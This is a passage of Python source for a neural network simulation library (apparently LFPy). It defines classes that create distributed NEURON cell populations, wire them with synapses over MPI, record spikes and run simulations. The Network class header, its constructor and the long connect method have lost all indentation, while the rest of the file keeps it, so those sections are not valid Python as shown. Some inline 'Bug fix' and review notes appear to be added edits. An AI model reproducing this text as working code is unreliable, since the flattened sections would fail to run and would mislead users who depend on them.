        use pt3d-info of the cell geometries switch. Defaults to False
    celsius: float or None
        Temperature in celsius. If nothing is specified here
        or in custom code it is 6.3 celcius
    verbose: bool
        verbose output switch. Defaults to False
    Examples
    --------
    >>> import LFPy
    >>> cellParameters = {
    >>>     'morphology': '<path to morphology.hoc>',
    >>>     'templatefile': '<path to template_file.hoc>',
    >>>     'templatename': 'templatename',
    >>>     'templateargs': None,
    >>>     'v_init': -65,
    >>>     'cm': 1.0,
    >>>     'Ra': 150,
    >>>     'passive': True,
    >>>     'passive_parameters': {'g_pas': 0.001, 'e_pas': -65.},
    >>>     'dt': 2**-3,
    >>>     'tstart': 0,
    >>>     'tstop': 50,
    >>> }
    >>> cell = LFPy.NetworkCell(**cellParameters)
    >>> cell.simulate()
    See also
    --------
    Cell
    TemplateCell
    """

    def __init__(self, **args):
        """Initialize TemplateCell and add spike-communication attributes."""
        super().__init__(**args)

        # list for spike-detecting NetCon object(s), filled by
        # create_spike_detector()
        self._hoc_sd_netconlist = neuron.h.List()
        # list of recording devices for action potentials
        self.spikes = []
        # refs to random number generators used with synapse mechanisms;
        # refs must be stored here so they are not garbage collected
        self.rng_list = []
        # separate list for synapses targeted by network connections
        self.netconsynapses = []
        # recording device for somatic membrane voltage
        self.somav = neuron.h.Vector()
        for sec in self.somalist:
            self.somav.record(sec(0.5)._ref_v)

    def create_synapse(self, cell, sec, x=0.5, syntype=neuron.h.ExpSyn,
                       synparams=dict(tau=2., e=0.),
                       assert_syn_values=False):
        """
        Create synapse object of type syntype on sec(x) of cell and
        append to list cell.netconsynapses
        TODO: Use LFPy.Synapse class if possible.
        Parameters
        ----------
        cell: object
            instantiation of class NetworkCell or similar
        sec: neuron.h.Section object,
            section reference on cell
        x: float in [0, 1],
            relative position along section
        syntype: hoc.HocObject
            NEURON synapse model reference, e.g., neuron.h.ExpSyn
        synparams: dict
            parameters for syntype, e.g., for neuron.h.ExpSyn we have:
                tau: float, synapse time constant
                e: float, synapse reversal potential
        assert_syn_values: bool
            if True, raise AssertionError if synapse attribute values do not
            match the values in the synparams dictionary
        Raises
        ------
        AssertionError
        """
        # create a synapse object on the target cell
        syn = syntype(x, sec=sec)
        if hasattr(syn, 'setRNG'):
            # Create the random number generator for the synapse
            rng = neuron.h.Random()
            # not sure if this is how it is supposed to be set up...
            rng.MCellRan4(np.random.randint(0, 2**32 - 1),
                          np.random.randint(0, 2**32 - 1))
            rng.uniform(0, 1)
            # used for e.g., stochastic synapse mechanisms (cf. BBP
            # microcircuit portal files)
            syn.setRNG(rng)
            cell.rng_list.append(rng)  # must store ref to rng object
        # Bug fix: append the synapse instance created (and possibly RNG
        # seeded) above. Previously a *second* fresh synapse was
        # instantiated here, so the seeded instance was discarded and an
        # extra, unconfigured point process lingered on the section.
        cell.netconsynapses.append(syn)

        for key, value in synparams.items():
            setattr(cell.netconsynapses[-1], key, value)
            # check that synapses are parameterized correctly
            if assert_syn_values:
                try:
                    np.testing.assert_almost_equal(
                        getattr(cell.netconsynapses[-1], key), value)
                except AssertionError:
                    raise AssertionError('{} = {} != {}'.format(
                        key, getattr(cell.netconsynapses[-1], key), value))

    def create_spike_detector(self, target=None, threshold=-10.,
                              weight=0.0, delay=0.0):
        """
        Create spike-detecting NetCon object attached to the cell's soma
        midpoint, but this could be extended to having multiple spike-detection
        sites. The NetCon object created is attached to the cell's
        `_hoc_sd_netconlist` attribute, and will be used by the Network class
        when creating connections between all presynaptic cells and
        postsynaptic cells on each local RANK.
        Parameters
        ----------
        target: None (default) or a NEURON point process
        threshold: float
            spike detection threshold
        weight: float
            connection weight (not used unless target is a point process)
        delay: float
            connection delay (not used unless target is a point process)
        """
        # create new NetCon objects for the connections. Activation times will
        # be triggered on the somatic voltage with a given threshold.
        for sec in self.somalist:
            self._hoc_sd_netconlist.append(neuron.h.NetCon(sec(0.5)._ref_v,
                                                           target,
                                                           sec=sec))
            self._hoc_sd_netconlist[-1].threshold = threshold
            self._hoc_sd_netconlist[-1].weight[0] = weight
            self._hoc_sd_netconlist[-1].delay = delay
class DummyCell(object):
    def __init__(self, totnsegs=0,
                 x=None,
                 y=None,
                 z=None,
                 d=None,
                 area=None,
                 length=None,
                 somainds=None):
        """
        Dummy Cell object initialized with all attributes needed for LFP
        calculations using the LFPy.RecExtElectrode class and methods.
        This cell can be imagined as one "super" cell containing transmembrane
        currents generated by all NetworkCell segments on this RANK at once.
        Parameters
        ----------
        totnsegs: int
            total number of segments
        x, y, z: ndarray
            arrays of shape (totnsegs, 2) with (x,y,z) coordinates of start
            and end points of segments in units of (um)
        d: ndarray
            array of length totnsegs with segment diameters
        area: ndarray
            array of segment surface areas
        length: ndarray
            array of segment lengths
        somainds: ndarray
            array of indices of somatic segments, returned by
            ``get_idx(section="soma")``
        """
        # set attributes; each None argument falls back to an empty array
        self.totnsegs = totnsegs
        self.x = x if x is not None else np.array([])
        self.y = y if y is not None else np.array([])
        self.z = z if z is not None else np.array([])
        self.d = d if d is not None else np.array([])
        self.area = area if area is not None else np.array([])
        # bug fix: the fallback condition previously tested `area`, so
        # `length=None` combined with a non-None `area` stored None here
        self.length = length if length is not None else np.array([])
        self.somainds = somainds if somainds is not None else np.array([])

    def get_idx(self, section="soma"):
        """Return indices of somatic segments; only "soma" is supported."""
        if section == "soma":
            return self.somainds
        else:
            raise ValueError('section argument must be "soma"')
class NetworkPopulation(object):
    """
    NetworkPopulation class representing a group of Cell objects
    distributed across RANKs.
    Parameters
    ----------
    CWD: path or None
        Current working directory
    CELLPATH: path or None
        Relative path from CWD to source files for cell model
        (morphology, hoc routines etc.)
    first_gid: int
        The global identifier of the first cell created in this population
        instance. The first_gid in the first population created should be 0
        and cannot exist in previously created NetworkPopulation instances
    Cell: class
        class defining a Cell object, see class NetworkCell above
    POP_SIZE: int
        number of cells in population
    name: str
        population name reference
    cell_args: dict
        keys and values for Cell object
    pop_args: dict
        keys and values for Network.draw_rand_pos assigning cell positions
    rotation_args: dict
        default cell rotations around x and y axis on the form
        { 'x': np.pi/2, 'y': 0 }. Can only have the keys 'x' and 'y'.
        Cells are randomly rotated around z-axis using the
        Cell.set_rotation() method.
    OUTPUTPATH: str
        path to output file destination
    """

    def __init__(self, CWD=None, CELLPATH=None, first_gid=0, Cell=NetworkCell,
                 POP_SIZE=4, name='L5PC',
                 cell_args=None, pop_args=None,
                 rotation_args=None,
                 OUTPUTPATH='example_parallel_network'):
        # set class attributes; None defaults are replaced by empty dicts
        self.CWD = CWD
        self.CELLPATH = CELLPATH
        self.first_gid = first_gid
        self.Cell = Cell
        self.POP_SIZE = POP_SIZE
        self.name = name
        self.cell_args = cell_args if cell_args is not None else dict()
        self.pop_args = pop_args if pop_args is not None else dict()
        self.rotation_args = rotation_args if rotation_args is not None \
            else dict()
        self.OUTPUTPATH = OUTPUTPATH

        # create folder for output if it does not exist (RANK 0 only; other
        # RANKs wait at the barrier)
        if RANK == 0:
            if not os.path.isdir(OUTPUTPATH):
                os.mkdir(OUTPUTPATH)
        COMM.Barrier()

        # container of Vector objects used to record times of action
        # potentials
        self.spike_vectors = []

        # set up population of cells on this RANK: global ids are assigned
        # round-robin across RANKs
        self.gids = [i + first_gid for i in range(POP_SIZE)
                     if (i + first_gid) % SIZE == RANK]

        # we have to enter the cell's corresponding file directory to
        # create cell because how EPFL set their code up.
        # Bug fix: use the sanitized self.cell_args here; the raw cell_args
        # argument may be None (its documented default), and **None raises.
        if CWD is not None:
            os.chdir(os.path.join(CWD, CELLPATH, self.name))
            self.cells = [Cell(**self.cell_args) for gid in self.gids]
            os.chdir(CWD)
        else:
            self.cells = [Cell(**self.cell_args) for gid in self.gids]

        # position each cell's soma in space (self.pop_args for the same
        # None-default reason as above)
        self.soma_pos = self.draw_rand_pos(POP_SIZE=len(self.gids),
                                           **self.pop_args)
        for i, cell in enumerate(self.cells):
            cell.set_pos(**self.soma_pos[i])

        # assign a random rotation around the z-axis of each cell
        self.rotations = np.random.uniform(0, np.pi * 2, len(self.gids))
        assert 'z' not in self.rotation_args.keys()
        for i, cell in enumerate(self.cells):
            cell.set_rotation(z=self.rotations[i], **self.rotation_args)

        # assign gid to each cell
        for gid, cell in zip(self.gids, self.cells):
            cell.gid = gid

        # gather gids, soma positions and cell rotations to RANK 0, and write
        # as structured array.
        if RANK == 0:
            populationData = flattenlist(COMM.gather(
                zip(self.gids, self.soma_pos, self.rotations)))

            # create structured array for storing data
            dtype = [('gid', 'i8'), ('x', float), ('y', float), ('z', float),
                     ('x_rot', float), ('y_rot', float), ('z_rot', float)]
            popDataArray = np.empty(len(populationData), dtype=dtype)
            for i, (gid, pos, z_rot) in enumerate(populationData):
                popDataArray[i]['gid'] = gid
                popDataArray[i]['x'] = pos['x']
                popDataArray[i]['y'] = pos['y']
                popDataArray[i]['z'] = pos['z']
                # x/y rotations are the fixed defaults; only z is randomized
                popDataArray[i]['x_rot'] = np.pi / 2
                popDataArray[i]['y_rot'] = 0.
                popDataArray[i]['z_rot'] = z_rot

            # dump to HDF5 file, replacing any pre-existing entry for this
            # population name
            with h5py.File(os.path.join(self.OUTPUTPATH,
                                        'cell_positions_and_rotations.h5'),
                           'a') as f:
                if self.name in f.keys():
                    del f[self.name]
                f[self.name] = popDataArray
        else:
            COMM.gather(zip(self.gids, self.soma_pos, self.rotations))

        # sync
        COMM.Barrier()

    def draw_rand_pos(self, POP_SIZE, radius, loc, scale, cap=None):
        """
        Draw some random location for POP_SIZE cells within radius radius,
        at mean depth loc and standard deviation scale.
        Returned argument is a list of dicts [{'x', 'y', 'z'},].
        Parameters
        ----------
        POP_SIZE: int
            Population size
        radius: float
            Radius of population.
        loc: float
            expected mean depth of somas of population.
        scale: float
            expected standard deviation of depth of somas of population.
        cap: None, float or length 2 list of floats
            if float, cap distribution between [loc-cap, loc+cap),
            if list, cap distribution between [loc-cap[0], loc+cap[1]]
        Returns
        -------
        soma_pos: list
            List of dicts of len POP_SIZE
            where dict have keys x, y, z specifying
            xyz-coordinates of cell at list entry `i`.
        Raises
        ------
        Exception
            if cap is neither None, a float nor a length 2 list
        """
        x = np.empty(POP_SIZE)
        y = np.empty(POP_SIZE)
        z = np.empty(POP_SIZE)
        # rejection-sample (x, y) uniformly within a circle of given radius
        for i in range(POP_SIZE):
            x[i] = (np.random.rand() - 0.5) * radius * 2
            y[i] = (np.random.rand() - 0.5) * radius * 2
            while np.sqrt(x[i]**2 + y[i]**2) >= radius:
                x[i] = (np.random.rand() - 0.5) * radius * 2
                y[i] = (np.random.rand() - 0.5) * radius * 2
        z = np.random.normal(loc=loc, scale=scale, size=POP_SIZE)
        if cap is not None:
            # bug fix: the messages below previously formatted the builtin
            # `float` type instead of the offending `cap` value
            if type(cap) in [float, np.float32, np.float64]:
                # redraw depths until all lie in [loc - cap, loc + cap)
                while not np.all((z >= loc - cap) & (z < loc + cap)):
                    inds = (z < loc - cap) ^ (z > loc + cap)
                    z[inds] = np.random.normal(loc=loc, scale=scale,
                                               size=inds.sum())
            elif isinstance(cap, list):
                assert len(cap) == 2, \
                    'cap = {} is not a length 2 list'.format(cap)
                while not np.all((z >= loc - cap[0]) & (z < loc + cap[1])):
                    inds = (z < loc - cap[0]) ^ (z > loc + cap[1])
                    z[inds] = np.random.normal(loc=loc, scale=scale,
                                               size=inds.sum())
            else:
                raise Exception('cap = {} is not None, a float or a '
                                'length 2 list of floats'.format(cap))

        return [{'x': x[i], 'y': y[i], 'z': z[i]} for i in range(POP_SIZE)]
class Network(object):
"""
Network class, creating distributed populations of cells of
type Cell and handling connections between cells in the respective
populations.
Parameters
----------
dt: float
Simulation timestep size
tstart: float
Start time of simulation
tstop: float
End time of simulation
v_init: float
Membrane potential set at first timestep across all cells
celsius: float
Global control of temperature, affect channel kinetics.
It will also be forced when creating the different Cell objects, as
LFPy.Cell and LFPy.TemplateCell also accept the same keyword
argument.
verbose: bool
if True, print out misc. messages
"""
def __init__(
self,
dt=0.1,
tstart=0.,
tstop=1000.,
v_init=-65.,
celsius=6.3,
OUTPUTPATH='example_parallel_network',
verbose=False):
# set attributes
self.dt = dt
self.tstart = tstart
self.tstop = tstop
self.v_init = v_init
self.celsius = celsius
self.OUTPUTPATH = OUTPUTPATH
self.verbose = verbose
# we need NEURON's ParallelContext for communicating NetCon events
self.pc = neuron.h.ParallelContext()
# create empty list for connections between cells (not to be confused
# with each cell's list of netcons _hoc_netconlist)
self._hoc_netconlist = neuron.h.List()
# The different populations in the Network will be collected in
# a dictionary of NetworkPopulation object, where the keys represent
# population names. The names are also put in a list ordered according
# to the order populations are created in (as some operations rely on
# this particular order)
self.populations = dict()
self.population_names = []
    def create_population(self, CWD=None, CELLPATH=None, Cell=NetworkCell,
                          POP_SIZE=4, name='L5PC',
                          cell_args=None, pop_args=None,
                          rotation_args=None):
        """
        Create and append a distributed POP_SIZE-sized population of cells of
        type Cell with the corresponding name. Cell-object references, gids on
        this RANK, population size POP_SIZE and names will be added to the
        lists Network.gids, Network.cells, Network.sizes and Network.names,
        respectively
        Parameters
        ----------
        CWD: path
            Current working directory
        CELLPATH: path
            Relative path from CWD to source files for cell model
            (morphology, hoc routines etc.)
        Cell: class
            class defining a Cell-like object, see class NetworkCell
        POP_SIZE: int
            number of cells in population
        name: str
            population name reference
        cell_args: dict
            keys and values for Cell object
        pop_args: dict
            keys and values for Network.draw_rand_pos assigning cell positions
        rotation_args: dict
            default cell rotations around x and y axis on the form
            { 'x': np.pi/2, 'y': 0 }. Can only have the keys 'x' and 'y'.
            Cells are randomly rotated around z-axis using the
            Cell.set_rotation method.
        """
        assert name not in self.populations.keys(), \
            'population name {} already taken'.format(name)
        # compute the first global id of this new population, based
        # on population sizes of existing populations
        first_gid = 0
        for p in self.populations.values():
            first_gid += p.POP_SIZE
        # create NetworkPopulation object
        population = NetworkPopulation(
            CWD=CWD,
            CELLPATH=CELLPATH,
            first_gid=first_gid,
            Cell=Cell,
            POP_SIZE=POP_SIZE,
            name=name,
            cell_args=cell_args,
            pop_args=pop_args,
            rotation_args=rotation_args,
            OUTPUTPATH=self.OUTPUTPATH)
        # associate gids of cells on this RANK such that NEURON can look up
        # at which RANK different cells are created when connecting the network
        for gid in population.gids:
            self.pc.set_gid2node(gid, RANK)
        # Prepare connection targets by iterating over local neurons in pop.
        for gid, cell in zip(population.gids, population.cells):
            # attach NetCon source (spike detector) to each cell's soma with
            # no target to cell gid
            cell.create_spike_detector(None)
            # associate cell gid with the NetCon source so the
            # ParallelContext can route its events to other RANKs
            self.pc.cell(gid, cell._hoc_sd_netconlist[-1])
            # record spike events (one Vector per local cell)
            population.spike_vectors.append(neuron.h.Vector())
            cell._hoc_sd_netconlist[-1].record(population.spike_vectors[-1])
        # add population object to dictionary of populations
        self.populations[name] = population
        # append population name to list (Network.populations.keys() not
        # unique)
        self.population_names.append(name)
    def get_connectivity_rand(self, pre='L5PC', post='L5PC', connprob=0.2):
        """
        Dummy function creating a (boolean) cell to cell connectivity matrix
        between pre and postsynaptic populations.
        Connections are drawn randomly between presynaptic cell gids in
        population 'pre' and postsynaptic cell gids in 'post' on this RANK with
        a fixed connection probability. self-connections are disabled if
        presynaptic and postsynaptic populations are the same.
        Parameters
        ----------
        pre: str
            presynaptic population name
        post: str
            postsynaptic population name
        connprob: float in [0, 1]
            connection probability, connections are drawn on random
        Returns
        -------
        ndarray, dtype bool
            n_pre x n_post array of connections between n_pre presynaptic
            neurons and n_post postsynaptic neurons on this RANK. Entries
            with True denotes a connection.
        """
        n_pre = self.populations[pre].POP_SIZE
        gids = np.array(self.populations[post].gids).astype(int)
        # first check if there are any postsyn cells on this RANK
        if gids.size > 0:
            # define incoming connections for cells on this RANK
            C = np.random.binomial(n=1, p=connprob,
                                   size=(n_pre, gids.size)
                                   ).astype(bool)
            if pre == post:
                # avoid self connections: map each (row, column) entry of C
                # to global (pre, post) gid pairs, drop equal pairs, then map
                # back to matrix indices
                gids_pre, gids_post = np.where(C)
                gids_pre += self.populations[pre].first_gid
                # NOTE(review): the column -> gid mapping below assumes
                # round-robin distribution of gids across RANKs
                # (gid = gids[0] + column * SIZE), matching how
                # NetworkPopulation assigns gids — confirm if that changes
                gids_post *= SIZE  # assume round-robin distribution of gids
                gids_post += self.populations[post].gids[0]
                inds = gids_pre != gids_post
                gids_pre = gids_pre[inds]
                gids_pre -= self.populations[pre].first_gid
                gids_post = gids_post[inds]
                gids_post -= self.populations[post].gids[0]
                gids_post //= SIZE
                c = np.c_[gids_pre, gids_post]
                # create boolean matrix from the surviving index pairs
                C = ss.csr_matrix((np.ones(gids_pre.shape[0], dtype=bool),
                                   (c[:, 0], c[:, 1])),
                                  shape=(n_pre, gids.size), dtype=bool)
                return C.toarray()
            else:
                return C
        else:
            # no postsynaptic cells on this RANK; empty connectivity
            return np.zeros((n_pre, 0), dtype=bool)
def connect(self, pre, post, connectivity,
syntype=neuron.h.ExpSyn,
synparams=dict(tau=2., e=0.),
weightfun=np.random.normal,
weightargs=dict(loc=0.1, scale=0.01),
minweight=0,
delayfun=stats.truncnorm,
delayargs=dict(a=0.3, b=np.inf, loc=2, scale=0.2),
mindelay=None,
multapsefun=stats.truncnorm,
multapseargs=dict(a=(1 - 4) / 1.,
b=(10 - 4) / 1,
loc=4,
scale=1),
syn_pos_args=dict(section=['soma', 'dend', 'apic'],
fun=[stats.norm] * 2,
funargs=[dict(loc=0, scale=100)] * 2,
funweights=[0.5] * 2,
z_min=-1E6, z_max=1E6,
),
save_connections=False,
):
"""
Connect presynaptic cells to postsynaptic cells. Connections are
drawn from presynaptic cells to postsynaptic cells, hence connectivity
array must only be specified for postsynaptic units existing on this
RANK.
Parameters
----------
pre: str
presynaptic population name
post: str
postsynaptic population name
connectivity: ndarray / (scipy.sparse array)
boolean connectivity matrix between pre and post.
syntype: hoc.HocObject
reference to NEURON synapse mechanism, e.g., ``neuron.h.ExpSyn``
synparams: dict
dictionary of parameters for synapse mechanism, keys 'e', 'tau'
etc.
weightfun: function
function used to draw weights from a numpy.random distribution
weightargs: dict
parameters passed to weightfun
minweight: float,
minimum weight in units of nS
delayfun: function
function used to draw delays from a subclass of
scipy.stats.rv_continuous or numpy.random distribution
delayargs: dict
parameters passed to ``delayfun``
mindelay: float,
minimum delay in multiples of dt. Ignored if ``delayfun`` is an
inherited from ``scipy.stats.rv_continuous``
multapsefun: function or None
function reference, e.g., ``scipy.stats.rv_continuous`` used to
draw a number of synapses for a cell-to-cell connection.
If None, draw only one connection
multapseargs: dict
arguments passed to multapsefun
syn_pos_args: dict
arguments passed to inherited ``LFPy.Cell`` method
``NetworkCell.get_rand_idx_area_and_distribution_norm`` to find
synapse locations.
save_connections: bool
if True (default False), save instantiated connections to HDF5 file
``Network.OUTPUTPATH/synapse_connections.h5`` as dataset
``<pre>:<post>`` using a structured ndarray with dtype
::
[('gid_pre'), ('gid', 'i8'), ('weight', 'f8'), ('delay', 'f8'),
('sec', 'U64'), ('sec.x', 'f8'),
('x', 'f8'), ('y', 'f8'), ('z', 'f8')],
where ``gid_pre`` is presynapic cell id,
``gid`` is postsynaptic cell id,
``weight`` connection weight, ``delay`` connection delay,
``sec`` section name, ``sec.x`` relative location on section,
and ``x``, ``y``, ``z`` the corresponding
midpoint coordinates of the target compartment.
Returns
-------
list
Length 2 list with ndarrays [conncount, syncount] with numbers of
instantiated connections and synapses.
Raises
------
DeprecationWarning
if ``delayfun`` is not a subclass of ``scipy.stats.rv_continuous``
"""
# check if delayfun is a scipy.stats.rv_continuous like function that
# provides a function `rvs` for random variates.
# Otherwise, raise some warnings
if not hasattr(delayfun, 'rvs'):
warn(f'argument delayfun={delayfun.__str__()} do not appear ' +
'scipy.stats.rv_continuous or scipy.stats.rv_discrete like ' +
'and will be deprecated in the future')
else:
if mindelay is not None:
warn(f'mindelay={mindelay} not usable with ' +
f'delayfun={delayfun.__str__()}')
# set up connections from all cells in presynaptic to post across RANKs
n0 = self.populations[pre].first_gid
# gids of presynaptic neurons:
gids_pre = np.arange(n0, n0 + self.populations[pre].POP_SIZE)
# count connections and synapses made on this RANK
conncount = connectivity.astype(int).sum()
syncount = 0
# keep track of synapse positions for this connect
# call on this rank such that these can be communicated and stored
syn_idx_pos = []
# iterate over gids on this RANK and create connections
for i, (gid_post, cell) in enumerate(zip(self.populations[post].gids,
self.populations[post].cells)
):
# do NOT iterate over all possible presynaptic neurons
for gid_pre in gids_pre[connectivity[:, i]]:
# throw a warning if sender neuron is identical to receiving
# neuron
if gid_post == gid_pre:
print(
'connecting cell w. gid {} to itself (RANK {})'.format(
gid_post, RANK))
# assess number of synapses
if multapsefun is None:
nidx = 1
else:
if hasattr(multapsefun, 'pdf'):
# assume we're dealing with a scipy.stats.rv_continuous
# like method. Then evaluate pdf at positive integer
# values and feed as custom scipy.stats.rv_discrete
# distribution
d = multapsefun(**multapseargs)
# number of multapses must be on interval [1, 100]
xk = np.arange(1, 100)
pk = d.pdf(xk)
pk /= pk.sum()
nidx = stats.rv_discrete(values=(xk, pk)).rvs()
# this aint pretty:
mssg = (
'multapsefun: '
+ multapsefun(**multapseargs).__str__()
+ f'w. multapseargs: {multapseargs} resulted '
+ f'in {nidx} synapses'
)
assert nidx >= 1, mssg
elif hasattr(multapsefun, 'pmf'):
# assume we're dealing with a scipy.stats.rv_discrete
# like method that can be used to generate random
# variates directly
nidx = multapsefun(**multapseargs).rvs()
mssg = (
f'multapsefun: {multapsefun().__str__()} w. '
+ f'multapseargs: {multapseargs} resulted in '
+ f'{nidx} synapses'
)
assert nidx >= 1, mssg
else:
warn(f'multapsefun{multapsefun.__str__()} will be ' +
'deprecated. Use scipy.stats.rv_continuous or ' +
'scipy.stats.rv_discrete like methods instead')
nidx = 0
j = 0
while nidx <= 0 and j < 1000:
nidx = int(round(multapsefun(**multapseargs)))
j += 1
if j == 1000:
raise Exception(
'change multapseargs as no positive '
'synapse # was found in 1000 trials')
# find synapse locations and corresponding section names
idxs = cell.get_rand_idx_area_and_distribution_norm(
nidx=nidx, **syn_pos_args)
secs = cell.get_idx_name(idxs)
# draw weights
weights = weightfun(size=nidx, **weightargs)
# redraw weights less that minweight
while np.any(weights < minweight):
j = weights < minweight
weights[j] = weightfun(size=j.sum(), **weightargs)
# draw delays
if hasattr(delayfun, 'rvs'):
delays = delayfun(**delayargs).rvs(size=nidx)
# check that all delays are > dt
try:
assert np.all(delays >= self.dt)
except AssertionError as ae:
raise ae(
f'the delayfun parameter a={delayargs["a"]} '
+ f'resulted in delay less than dt={self.dt}'
)
else:
delays = delayfun(size=nidx, **delayargs)
# redraw delays shorter than mindelay
while np.any(delays < mindelay):
j = delays < mindelay
delays[j] = delayfun(size=j.sum(), **delayargs)
for i, ((idx, secname, secx), weight, delay) in enumerate(
zip(secs, weights, delays)):
cell.create_synapse(
cell,
# TODO: Find neater way of accessing
# Section reference, this looks slow
sec=list(
cell.allseclist)[
np.where(
np.array(
cell.allsecnames) == secname)[0][0]],
x=secx,
syntype=syntype,
synparams=synparams)
# connect up NetCon object
nc = self.pc.gid_connect(gid_pre, cell.netconsynapses[-1])
nc.weight[0] = weight
nc.delay = delays[i]
self._hoc_netconlist.append(nc)
# store also synapse indices allowing for computing LFPs
# from syn.i
cell.synidx.append(idx)
# store gid and xyz-coordinate of synapse positions
syn_idx_pos.append((gid_pre,
cell.gid,
weight,
delays[i],
secname,
secx,
cell.x[idx].mean(axis=-1),
cell.y[idx].mean(axis=-1),
cell.z[idx].mean(axis=-1)))
syncount += nidx
conncount = COMM.reduce(conncount, op=MPI.SUM, root=0)
syncount = COMM.reduce(syncount, op=MPI.SUM, root=0)
if RANK == 0:
print('Connected population {} to {}'.format(pre, post),
'by {} connections and {} synapses'.format(conncount,
syncount))
else:
conncount = None
syncount = None
# gather and write syn_idx_pos data
if save_connections:
if RANK == 0:
synData = flattenlist(COMM.gather(syn_idx_pos))
# convert to structured array
dtype = [('gid_pre', 'i8'),
('gid', 'i8'),
('weight', 'f8'),
('delay', 'f8'),
('sec', 'S64'),
('sec.x', 'f8'),
('x', 'f8'),
('y', 'f8'),
('z', 'f8')]
synDataArray = np.empty((len(synData), ), dtype=dtype)
for i, (gid_pre, gid, weight, delay, secname, secx, x, y, z
) in enumerate(synData):
synDataArray[i]['gid_pre'] = gid_pre
synDataArray[i]['gid'] = gid
synDataArray[i]['weight'] = weight
synDataArray[i]['delay'] = delay
synDataArray[i]['sec'] = secname
synDataArray[i]['sec.x'] = secx
synDataArray[i]['x'] = x
synDataArray[i]['y'] = y
synDataArray[i]['z'] = z
# Dump to hdf5 file, append to file if entry exists
with h5py.File(os.path.join(self.OUTPUTPATH,
'synapse_connections.h5'),
'a') as f:
key = '{}:{}'.format(pre, post)
if key in f.keys():
del f[key]
assert key not in f.keys()
f[key] = synDataArray
# save global connection data (synapse type/parameters)
# equal for all synapses
try:
grp = f.create_group('synparams')
except ValueError:
grp = f['synparams']
try:
subgrp = grp.create_group(key)
except ValueError:
subgrp = grp[key]
subgrp['mechanism'] = syntype.__str__().strip('()')
for key, value in synparams.items():
subgrp[key] = value
else:
COMM.gather(syn_idx_pos)
return COMM.bcast([conncount, syncount])
    def enable_extracellular_stimulation(self, electrode, t_ext=None, n=1,
                                         seed=None):
        """Not implemented for Network simulations; always raises
        NotImplementedError."""
        raise NotImplementedError()
    def simulate(self, probes=None,
                 rec_imem=False, rec_vmem=False,
                 rec_ipas=False, rec_icap=False,
                 rec_isyn=False, rec_vmemsyn=False, rec_istim=False,
                 rec_pop_contributions=False,
                 rec_variables=[], variable_dt=False, atol=0.001,
                 to_memory=True, to_file=False,
                 file_name='OUTPUT.h5',
                 **kwargs):
        """
        This is the main function running the simulation of the network model.
        Parameters
        ----------
        probes: list of :obj:, optional
            None or list of LFPykit.RecExtElectrode like object instances that
            each have a public method `get_transformation_matrix` returning
            a matrix that linearly maps each compartments' transmembrane
            current to corresponding measurement as
            .. math:: \\mathbf{P} = \\mathbf{M} \\mathbf{I}
        rec_imem: bool
            If true, segment membrane currents will be recorded
            If no electrode argument is given, it is necessary to
            set rec_imem=True in order to calculate LFP later on.
            Units of (nA).
        rec_vmem: bool
            record segment membrane voltages (mV)
        rec_ipas: bool
            record passive segment membrane currents (nA)
        rec_icap: bool
            record capacitive segment membrane currents (nA)
        rec_isyn: bool
            record synaptic currents of from Synapse class (nA)
        rec_vmemsyn: bool
            record membrane voltage of segments with Synapse (mV)
        rec_istim: bool
            record currents of StimIntraElectrode (nA)
        rec_pop_contributions: bool
            If True, compute and return single-population contributions to
            the extracellular potential during simulation time
        rec_variables: list of str
            variables to record, i.e arg=['cai', ]
        variable_dt: boolean
            use variable timestep in NEURON. Can not be combined with `to_file`
        atol: float
            absolute tolerance used with NEURON variable timestep
        to_memory: bool
            Simulate to memory. Only valid with `probes=[<probe>, ...]`, which
            store measurements to -> <probe>.data
        to_file: bool
            only valid with `probes=[<probe>, ...]`, saves measurement in
            hdf5 file format.
        file_name: str
            If to_file is True, file which measurements will be
            written to. The file format is HDF5, default is "OUTPUT.h5", put
            in folder Network.OUTPUTPATH
        **kwargs: keyword argument dict values passed along to function
            `__run_simulation_with_probes()`, containing some or all of
            the boolean flags: `use_ipas`, `use_icap`, `use_isyn`
            (defaulting to `False`).
        Returns
        -------
        events
            Dictionary with keys `times` and `gids`, where values are
            ndarrays with detected spikes and global neuron identifiers
        Raises
        ------
        Exception
            if `CVode().use_fast_imem()` method not found
        AssertionError
            if rec_pop_contributions==True and probes==None
        """
        # set up integrator, use the CVode().fast_imem method by default
        # as it doesn't hurt sim speeds much if at all.
        cvode = neuron.h.CVode()
        try:
            cvode.use_fast_imem(1)
        except AttributeError:
            raise Exception('neuron.h.CVode().use_fast_imem() not found. '
                            'Please update NEURON to v.7.4 or newer')
        # test some of the inputs
        if probes is None:
            assert rec_pop_contributions is False, \
                'rec_pop_contributions can not be True when probes is None'
        # fixed-step recorders take an explicit dt; variable-step recorders
        # must not (NEURON decides the sample times)
        if not variable_dt:
            dt = self.dt
        else:
            dt = None
        # attach the requested NEURON recorders to every cell on this RANK
        for name in self.population_names:
            for cell in self.populations[name].cells:
                cell._set_soma_volt_recorder(dt)
                if rec_imem:
                    cell._set_imem_recorders(dt)
                if rec_vmem:
                    cell._set_voltage_recorders(dt)
                if rec_ipas:
                    cell._set_ipas_recorders(dt)
                if rec_icap:
                    cell._set_icap_recorders(dt)
                if len(rec_variables) > 0:
                    cell._set_variable_recorders(rec_variables)
        # run fadvance until t >= tstop, and calculate LFP if asked for
        # NOTE(review): probes=None combined with to_file=True falls through
        # to __run_simulation_with_probes(), which iterates over `probes`;
        # presumably callers must supply probes whenever to_file is True --
        # confirm.
        if probes is None and not rec_pop_contributions and not to_file:
            if not rec_imem:
                if self.verbose:
                    print("rec_imem==False, not recording membrane currents!")
            self.__run_simulation(cvode, variable_dt, atol)
        else:
            self.__run_simulation_with_probes(
                cvode=cvode,
                probes=probes,
                variable_dt=variable_dt,
                atol=atol,
                to_memory=to_memory,
                to_file=to_file,
                file_name='tmp_output_RANK_{:03d}.h5',  # per-RANK temp file, merged below
                rec_pop_contributions=rec_pop_contributions,
                **kwargs)
        # convert the hoc recording vectors to numpy arrays / cell attributes
        for name in self.population_names:
            for cell in self.populations[name].cells:
                # somatic trace
                cell.somav = np.array(cell.somav)
                if rec_imem:
                    cell._calc_imem()
                if rec_ipas:
                    cell._calc_ipas()
                if rec_icap:
                    cell._calc_icap()
                if rec_vmem:
                    cell._collect_vmem()
                if rec_isyn:
                    cell._collect_isyn()
                if rec_vmemsyn:
                    cell._collect_vsyn()
                if rec_istim:
                    cell._collect_istim()
                if len(rec_variables) > 0:
                    cell._collect_rec_variables(rec_variables)
                if hasattr(cell, '_hoc_netstimlist'):
                    del cell._hoc_netstimlist
